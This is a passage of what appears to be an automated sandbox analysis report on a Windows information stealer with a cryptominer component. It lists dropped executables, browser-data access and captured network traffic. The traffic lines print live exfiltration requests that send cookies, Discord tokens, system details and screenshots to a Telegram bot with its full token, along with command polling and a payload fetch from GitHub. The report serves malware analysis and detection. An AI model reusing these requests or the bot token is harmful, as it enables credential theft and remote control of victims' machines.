                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0036C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_0036C4A8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0037E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_0037E560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,6_2_00007FF647787F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,6_2_00007FF647787F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647791FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF647791FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647778B00 FindFirstFileExW,FindClose,6_2_00007FF647778B00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB88DCE0 FindFirstFileExW,7_2_00000235BB88DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,7_2_00007FF7DFD38670
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD28D00 FindFirstFileExW,FindClose,7_2_00007FF7DFD28D00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,7_2_00007FF7DFD38670
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7DFD426C4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8874DCE0 FindFirstFileExW,8_2_000001EB8874DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\extJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefpJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\defJump to behavior

                                  Networking

                                  barindex
                                  Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:61625 -> 1.1.1.1:53
                                  Source: C:\ProgramData\svchost.exeNetwork Connect: 216.58.212.132 80
                                  Source: C:\ProgramData\svchost.exeNetwork Connect: 185.199.109.133 443
                                  Source: C:\ProgramData\svchost.exeHTTP traffic: GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive
                                  Source: HTTP traffic: GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive
                                  Source: HTTP traffic: GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive
                                  Source: unknownDNS query: name: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(3.27%20kb) HTTP/1.1Content-Type: multipart/form-data; boundary="463d8e90-76b1-4e7d-9810-9ea4ed1571fc"Host: api.telegram.orgContent-Length: 2109Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: POST /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendDocument?chat_id=6024388590&caption=%F0%9F%93%B8Screenshot%20taken HTTP/1.1Content-Type: multipart/form-data; boundary="7e50d2cf-ee1f-4ae5-9e38-65693b30e2eb"Host: api.telegram.orgContent-Length: 128871Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                  Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
                                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                                  Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
                                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 01:56:40 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=ISO-8859-1Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aiQhgy_sbOHoc9zCQcchNA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hpP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 8471X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:40 GMT; path=/; domain=.google.com; SecureSet-Cookie: AEC=AQTF6Hzc44E2muI_JCMTesoFs_XrQMBQ4j4mMnT3QfBhwhghiDa3ob9UOeY; expires=Mon, 02-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=laxSet-Cookie: NID=514=CbNGde4uPsMuHjhUahG7Gu93zHQxj5m4ogfTpQcwvgyV-QaM_8Jn4VY2LeLIWTl6oLCfc6EGVpX4T7p5p6K0OJL01GFc4o4ljhFfRKmg4I-BHiFnFTqVEEcJ0tDKCp3Xzs8YC4HjEGgip-MGRb_DAAOaRvTkeR9yBl7q4oppoG8; expires=Thu, 05-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 69 77 db b8 d2 e6 f7 fc 0a 9a 99 ab 88 c7 b4 44 52 bb 64 da e3 38 ce d2 37 e9 a4 e3 f4 72 db ed f1 0b 92 90 c4 98 8b 4c 52 b6 15 5b ff 7d 9e 02 b8 49 56 ba fb ed 99 33 67 9c 58 22 80 02 50 1b 0a 55 05 d0 87 7b 5e ec 66 ab 05 57 e6 59 18 1c 1d d2 a7 e2 67 3c 4c dd 78 c1 6d 55 15 05 02 b0 d5 Data Ascii: |iwDRd87rLR[}IV3gX"PU{^fWYg<LxmU
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 01:56:50 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=ISO-8859-1Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-An7JMPqZmmjywSuMTUczRw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hpP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 8484X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:50 GMT; path=/; domain=.google.com; SecureSet-Cookie: AEC=AQTF6HzDL0BjW3Zk2wmBbdU3MXAt8fPxQQ_WnQ8i5rULsv9QOgDG3Z4FQg; expires=Mon, 02-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=laxSet-Cookie: NID=514=R5bSnjClrfCueKu9bBCrQU33sXXP7jjcqJXzSJxURWqdaL2SrYCiBQ6QVuVhx1R_rSRrRove5W9Ea1vEKV1XsDKi_sc9RelRnnT_sBssk2RlIy-C-OOJEfWykK7Szx6S7gJMeJDEy3KzSKkkt97Qr70E2jNK-vvRR8-omBVKiaA; expires=Thu, 05-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 7b 7b db b6 d2 e7 ff f9 14 34 b3 47 11 1f d3 12 49 dd 25 d3 5e c7 71 2e 3d 49 93 c6 69 4f 5b d7 eb 17 24 21 89 31 2f 32 49 d9 56 6c 7d f7 fd 0d c0 9b 64 a5 ed db dd 67 9f 4d 1b 9b 04 06 83 b9 61 30 33 00 73 b8 e7 c5 6e b6 5a 70 65 9e 85 c1 d1 21 fd 54 fc 8c 87 a9 1b 2f b8 ad aa e2 85 00 6c 75 Data Ascii: |{{4GI%^q.=IiO[$!1/2IVl}dgMa03snZpe!T/lu
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 01:57:07 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=ISO-8859-1Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-b41Ni5nQpr_ukMwRTjeo6g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hpP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 8452X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: AEC=AQTF6HzwyDnnBZT3MJtaoyp0VqWUKf8HmHAKViz_1V-lJV09jizrkLvTcJc; expires=Mon, 02-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=laxSet-Cookie: NID=514=ZKVoyvXbDOkf_5MfAkgWqLQfedWI8bq4aK17jtJLDoFm3vZ0KRFwixFpemSL8gbUXVuvQYfVm1osSoyvy45AkkQhmZVEQ1OdyguLCxESezCWnQhNbtdlgzlWT5ZRVGREMKLnuTF5SHqSe1yCC0n1Yp149vsh8H1JXBY5yFEZUAQ; expires=Thu, 